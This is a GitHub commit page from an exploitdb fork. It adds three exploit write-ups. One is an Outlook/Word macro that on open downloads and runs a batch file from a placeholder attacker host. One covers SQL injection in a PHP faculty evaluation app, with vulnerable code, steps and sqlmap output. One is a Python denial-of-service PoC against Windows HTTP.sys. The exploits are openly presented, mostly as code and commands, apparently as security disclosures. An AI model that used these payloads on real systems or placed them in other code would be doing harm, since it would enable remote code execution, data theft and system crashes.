forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
4 changed files
with
163 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution | ||
## Author: nu11secur1ty | ||
## Date: 07.07.2023 | ||
## Vendor: https://www.microsoft.com/ | ||
## Software: https://outlook.live.com/owa/ | ||
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ | ||
## CVE-2023-33131 | ||
|
||
|
||
## Description: | ||
In this vulnerability, the Microsoft Outlook app allows an attacker to | ||
send an infected Word file with malicious content | ||
to everyone who using the Outlook app, no matter web or local. | ||
Microsoft still doesn't have a patch against this 0-day vulnerability today. | ||
|
||
## Staus: HIGH Vulnerability | ||
|
||
[+]Exploit: | ||
|
||
- The malicious Word file: | ||
|
||
```js | ||
Sub AutoOpen() | ||
Call Shell("cmd.exe /S /c" & "curl -s | ||
https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > | ||
nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus) | ||
End Sub | ||
|
||
``` | ||
|
||
## Reproduce: | ||
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131) | ||
|
||
## Proof and Exploit | ||
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html) | ||
|
||
## Time spend: | ||
00:30:00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection | ||
# Date: 07/2023 | ||
# Exploit Author: Andrey Stoykov | ||
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html | ||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip | ||
# Version: 1.0 | ||
# Tested on: Windows Server 2022 | ||
|
||
|
||
SQLi #1 | ||
|
||
File: edit_evaluation | ||
|
||
Line #4 | ||
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array(); | ||
[...] | ||
|
||
|
||
SQLi #2 | ||
|
||
File: view_faculty.php | ||
|
||
Line #4 | ||
|
||
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer | ||
[...] | ||
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array(); | ||
[...] | ||
|
||
|
||
Steps to Exploit: | ||
|
||
1. Login to application | ||
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1" | ||
3. Copy request to intercept proxy to file | ||
4. Exploit using SQLMap | ||
|
||
|
||
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint | ||
|
||
[...] | ||
[INFO] testing MySQL | ||
[INFO] confirming MySQL | ||
[INFO] the back-end DBMS is MySQL | ||
[INFO] actively fingerprinting MySQL | ||
[INFO] executing MySQL comment injection fingerprint | ||
back-end DBMS: active fingerprint: MySQL >= 5.7 | ||
comment injection fingerprint: MySQL 5.6.49 | ||
fork fingerprint: MariaDB | ||
[...] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,70 @@ | ||
## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution | ||
## Author: nu11secur1ty | ||
## Date: 01.14.2022 | ||
## Vendor: https://www.microsoft.com/ | ||
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264 | ||
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 | ||
## CVE-2022-21907 | ||
|
||
|
||
## Description: | ||
NOTE: After a couple of hours of tests and experiments, I found that | ||
there have been no vulnerabilities, this is just a ridiculous | ||
experiment of Microsoft. When I decided to install the IIS packages on | ||
these Windows platforms, everything was ok, and everything is patched! | ||
Windows Server 2019, Windows 10 version 1809 - 2018 year are not | ||
vulnerable by default, but after I decided to upgrade from 1909 to | ||
2004. I found a serious problem! The Windows 10 version 2004 - 2020 | ||
year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack | ||
method: buffer overflow - deny of service and restart the system. This | ||
problem exists, from last year which is reported on CVE-2021-31166, | ||
and still there! On that days I have worked on it again with the help | ||
and collaboration of Axel Souchet 0vercl0k the author of the idea. On | ||
that day, I wrote an only one-line command to exploit this | ||
vulnerability! | ||
|
||
[+]Exploit: | ||
```python | ||
#!/usr/bin/python | ||
# Author @nu11secur1ty | ||
# CVE-2022-21907 | ||
|
||
from colorama import init, Fore, Back, Style | ||
init(convert=True) | ||
import requests | ||
import time | ||
|
||
print(Fore.RED +"Please input your host...\n") | ||
print(Style.RESET_ALL) | ||
|
||
print(Fore.YELLOW) | ||
host = input() | ||
print(Style.RESET_ALL) | ||
|
||
print(Fore.BLUE +"Sending of especially malicious crafted packages, | ||
please wait...") | ||
print(Style.RESET_ALL) | ||
time.sleep(17) | ||
|
||
print(Fore.GREEN) | ||
# The PoC :) | ||
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': | ||
'AAAAAAAAAAAAAAAAAAAAAAAA,\ | ||
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ | ||
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ | ||
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ | ||
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ | ||
****************************stupiD, *, ,',}) | ||
# Not necessary :) | ||
print(poc,"\n") | ||
print(Style.RESET_ALL) | ||
``` | ||
|
||
## Reproduce: | ||
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907) | ||
|
||
## Proof and Exploit | ||
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html) | ||
|
||
## Time spend: | ||
05:30:00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters